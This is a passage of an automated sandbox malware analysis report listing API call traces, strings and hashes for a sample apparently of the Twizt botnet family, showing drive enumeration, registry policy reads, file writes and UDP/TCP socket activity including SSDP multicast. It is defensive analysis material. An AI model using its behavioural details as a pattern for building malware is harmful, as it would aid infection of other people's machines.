                                                                          • Instruction Fuzzy Hash: 27213A74A40348FBEB14DF94CC49FEEB775AB04704F1084A9FA11AB2D0C7BA6A40CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AE58
                                                                          • WriteFile.KERNELBASE(000000FF,00000000,?,?,00000000), ref: 0040AE79
                                                                          • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AE83
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040AE8D
                                                                          • InterlockedExchange.KERNEL32(00416068,0000003D), ref: 0040AE9A
                                                                          Strings
                                                                          • C:\Users\user\tbtnds.dat, xrefs: 0040AE53
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                          • String ID: C:\Users\user\tbtnds.dat
                                                                          • API String ID: 442028454-681901067
                                                                          • Opcode ID: 6f59d5be5e34e3d070bb4230317ffaf4271f876ca047c3a08f5284c4181a4651
                                                                          • Instruction ID: 0da220b8b1f77c32e275edd0b19d3e77d455ccd5d956affd98337f50121a7ab7
                                                                          • Opcode Fuzzy Hash: 6f59d5be5e34e3d070bb4230317ffaf4271f876ca047c3a08f5284c4181a4651
                                                                          • Instruction Fuzzy Hash: D5315EB8A40309EBCB14CF98DC45F9EB771FB48300F208569E51567390D774AA51CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                          • String ID: %s%s
                                                                          • API String ID: 1447977647-3252725368
                                                                          • Opcode ID: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
                                                                          • Instruction ID: a0bb0d1763f58919fadf504be34b28e9f79e59c8b133fe7279793914b8ec670d
                                                                          • Opcode Fuzzy Hash: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
                                                                          • Instruction Fuzzy Hash: 92310AB0D05218EFCB50DF99DC88BDDBBB4FB48304F1085AAE609B6290D7795A84CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLogicalDrives.KERNELBASE ref: 00406346
                                                                          • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                          • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                          • RegCloseKey.KERNELBASE(?), ref: 004063DE
                                                                          Strings
                                                                          • NoDrives, xrefs: 004063B8
                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseDrivesLogicalOpenQueryValue
                                                                          • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                          • API String ID: 2666887985-3471754645
                                                                          • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                          • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                          • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                          • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
                                                                            • Part of subcall function 0040D490: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D4D0
                                                                            • Part of subcall function 0040D490: CloseHandle.KERNEL32(?), ref: 0040D4E9
                                                                          • CreateThread.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 0040D41F
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
                                                                          • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                          • String ID:
                                                                          • API String ID: 2251373460-0
                                                                          • Opcode ID: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
                                                                          • Instruction ID: 3905a71daa0159e526e2bdbd6071991b109cebefbf6d86c4cf37b1ecd5ad8e98
                                                                          • Opcode Fuzzy Hash: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
                                                                          • Instruction Fuzzy Hash: F831F8B4A00208EFDB04DF94D889F9EBBB5EB48308F0081A9E945A7390D775AA95CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                          • htons.WS2_32(?), ref: 00401281
                                                                          • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                          • String ID: pdu
                                                                          • API String ID: 2164660128-2320407122
                                                                          • Opcode ID: 03596814560310664b4f78611db666ac15f7015c2758b53f67dc60419e7b6bb9
                                                                          • Instruction ID: 2eaa47314137ae48bc86a2d98b28c98b453a90a93c27253c89cefaff09ddeb80
                                                                          • Opcode Fuzzy Hash: 03596814560310664b4f78611db666ac15f7015c2758b53f67dc60419e7b6bb9
                                                                          • Instruction Fuzzy Hash: 7031B2362083009BC710DF6DD880A9BBBE4AFC9714F04457EFD98A7382D6349914C7AB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000002,?,?,00407C66), ref: 00406F58
                                                                          • SysAllocString.OLEAUT32(C:\Users\user\AppData\Local\Temp\135143440.exe), ref: 00406F63
                                                                          • CoUninitialize.OLE32 ref: 00406F88
                                                                            • Part of subcall function 00406FA0: SysFreeString.OLEAUT32(00000000), ref: 004071B8
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00406F82
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\135143440.exe, xrefs: 00406F5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: String$Free$AllocInitializeUninitialize
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                          • API String ID: 459949847-2853581951
                                                                          • Opcode ID: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
                                                                          • Instruction ID: 8a6b4e1f6fa2c5cc19a61eea1a68b2ec0aac259eb3575b686c6209df8efe477e
                                                                          • Opcode Fuzzy Hash: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
                                                                          • Instruction Fuzzy Hash: 98E092B4A40208FBD7009BE0ED0EB8D77349B05305F0040A4F90666291DAB95E80C755
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetDriveTypeW.KERNELBASE(0040629F), ref: 004062CD
                                                                          • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                                                          • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 00406324
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeviceDriveQueryType
                                                                          • String ID: \??\
                                                                          • API String ID: 1681518211-3047946824
                                                                          • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                          • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                          • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                          • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040E9F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$ChangeCloseCreateFindNotificationSize
                                                                          • String ID: `k@
                                                                          • API String ID: 4178644524-1195631054
                                                                          • Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                          • Instruction ID: 241503f102ff988800a1529ff4214dfa730f02490b079578101ca7fb38dafef3
                                                                          • Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                          • Instruction Fuzzy Hash: F7F01C74A40308FBDB20DFA4DC49B8DBBB4AB04701F208295FA04BB2D0D6B56A908B44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ioctlsocket.WS2_32 ref: 0040112B
                                                                          • recvfrom.WS2_32 ref: 0040119C
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                          • String ID:
                                                                          • API String ID: 3980219359-0
                                                                          • Opcode ID: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
                                                                          • Instruction ID: e93cb10c30494a4e33d228fb1a439b2c2c35c7ccb48714dd22f79771c93e9d83
                                                                          • Opcode Fuzzy Hash: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
                                                                          • Instruction Fuzzy Hash: E921E5B11043016FC304DF65DC84A6BB7E9EF88314F004A3EF55592290E774DD4887EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00407230: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407250
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 004071B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFreeInstanceString
                                                                          • String ID: Microsoft Corporation
                                                                          • API String ID: 586785272-3838278685
                                                                          • Opcode ID: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
                                                                          • Instruction ID: b15f4297b17ed5f57f8313cde646c824d4e9e4ad422ceb8e026561d0ece074f1
                                                                          • Opcode Fuzzy Hash: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
                                                                          • Instruction Fuzzy Hash: 9591FD75A0450ADFCB04DF94C894AAFB3B5BF49304F208169E515BB3E4D734AD42CBA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407C61), ref: 0040D88A
                                                                            • Part of subcall function 0040D950: socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
                                                                            • Part of subcall function 0040D950: htons.WS2_32(0000076C), ref: 0040D9A0
                                                                            • Part of subcall function 0040D950: inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
                                                                            • Part of subcall function 0040D950: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD
                                                                            • Part of subcall function 0040D950: bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
                                                                            • Part of subcall function 0040D950: lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
                                                                            • Part of subcall function 0040D950: sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
                                                                            • Part of subcall function 0040D950: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45
                                                                            • Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
                                                                            • Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DCA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                          • String ID: TCP$UDP
                                                                          • API String ID: 1519345861-1097902612
                                                                          • Opcode ID: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
                                                                          • Instruction ID: adc5519654865a9846dc14ee6574ade53ee5e8f68d7e54780b62f97b8647e200
                                                                          • Opcode Fuzzy Hash: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
                                                                          • Instruction Fuzzy Hash: FE11AFB5E04208EBDB00EFD5EC45BAE7778EB44308F1088AAE510772C2E6785A54CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CD1C
                                                                          • InterlockedIncrement.KERNEL32(000000FF), ref: 0040CD51
                                                                          • InterlockedDecrement.KERNEL32(000000FF), ref: 0040CE54
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementExchangeIncrement
                                                                          • String ID:
                                                                          • API String ID: 2813130747-0
                                                                          • Opcode ID: 7eca04d12bb9d05337c201d62d9712200ab57323bc6eb365ab38248f78f31c1e
                                                                          • Instruction ID: 1c7eeb495bf0c40ce5b1f0ecd416c92c842ec860dbf3e71f0667dc4b3018cc5d
                                                                          • Opcode Fuzzy Hash: 7eca04d12bb9d05337c201d62d9712200ab57323bc6eb365ab38248f78f31c1e
                                                                          • Instruction Fuzzy Hash: 7A41C5B5E00204FBDF00DBA4D885BAF7B75AF04304F048269F5057B2C2D679AA4187DA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(Twizt,0040CD76,0040CD76,?,?,0040CD76,000000FF,0040CD76,0040CD76,000000FF,00000000), ref: 0040B70C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: Twizt$Twizt
                                                                          • API String ID: 1659193697-16428492
                                                                          • Opcode ID: 28c6feef410d2018e6e3de035ae19f054df257f5425241415404bfbee8c49d30
                                                                          • Instruction ID: 84ca981f6759ac35c37697c13bd51ebdb7c58ca5c34682a8d32d29454b0b1397
                                                                          • Opcode Fuzzy Hash: 28c6feef410d2018e6e3de035ae19f054df257f5425241415404bfbee8c49d30
                                                                          • Instruction Fuzzy Hash: C1110075900108BFCB04DF98D841D9EBBB5EF48304F14C1A9FD19AB342D635EA10CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 0040D013
                                                                          • htons.WS2_32(00009E34), ref: 0040D045
                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0040D05F
                                                                            • Part of subcall function 0040AD80: shutdown.WS2_32(0040AD6D,00000002), ref: 0040AD89
                                                                            • Part of subcall function 0040AD80: closesocket.WS2_32(0040AD6D), ref: 0040AD93
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: closesocketconnecthtonsshutdownsocket
                                                                          • String ID:
                                                                          • API String ID: 1987800339-0
                                                                          • Opcode ID: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                                                          • Instruction ID: 2e7e6d0bbd3fe3fffc8dbbd22c1a4ff0b41f748ad7b4bc9bd1ee776ebcbe5d5a
                                                                          • Opcode Fuzzy Hash: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                                                          • Instruction Fuzzy Hash: E9115E74D05209EBCB10DFE4D909AAEB770AF08324F2042A9E829A73D0D7744F05975A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040A090: GetCurrentProcessId.KERNEL32(?,00409FFB,?,0040C90E,00000010,?,?,?,?,?,?,0040C67B), ref: 0040A093
                                                                          • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,0040A007,?,0040C90E,00000010,?,?,?,?,?,?,0040C67B), ref: 0040A0DC
                                                                          • HeapSetInformation.KERNEL32(021A0000,00000000,00000002,00000004), ref: 0040A106
                                                                          • GetCurrentProcessId.KERNEL32 ref: 0040A10C
                                                                            • Part of subcall function 0040A120: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A13C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                          • String ID:
                                                                          • API String ID: 3179415709-0
                                                                          • Opcode ID: 6e4ea9a8f9775c1dfdd052d4a1efd7a2f3bc80083ff0a66d15f28d6d25a97103
                                                                          • Instruction ID: 286741cd662b80523320d166f89557ed49807363007196fac8a26e8fd60d1c43
                                                                          • Opcode Fuzzy Hash: 6e4ea9a8f9775c1dfdd052d4a1efd7a2f3bc80083ff0a66d15f28d6d25a97103
                                                                          • Instruction Fuzzy Hash: 22F090B0544308AFD724DF65BC0ABA63674B744315F44813AF6089A2D1EBB99824CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040A090: GetCurrentProcessId.KERNEL32(?,00409FFB,?,0040C90E,00000010,?,?,?,?,?,?,0040C67B), ref: 0040A093
                                                                          • RtlAllocateHeap.NTDLL(021A0000,?,-0000000C), ref: 0040A03A
                                                                          • memset.NTDLL ref: 0040A074
                                                                            • Part of subcall function 0040A0B0: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,0040A007,?,0040C90E,00000010,?,?,?,?,?,?,0040C67B), ref: 0040A0DC
                                                                            • Part of subcall function 0040A0B0: HeapSetInformation.KERNEL32(021A0000,00000000,00000002,00000004), ref: 0040A106
                                                                            • Part of subcall function 0040A0B0: GetCurrentProcessId.KERNEL32 ref: 0040A10C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
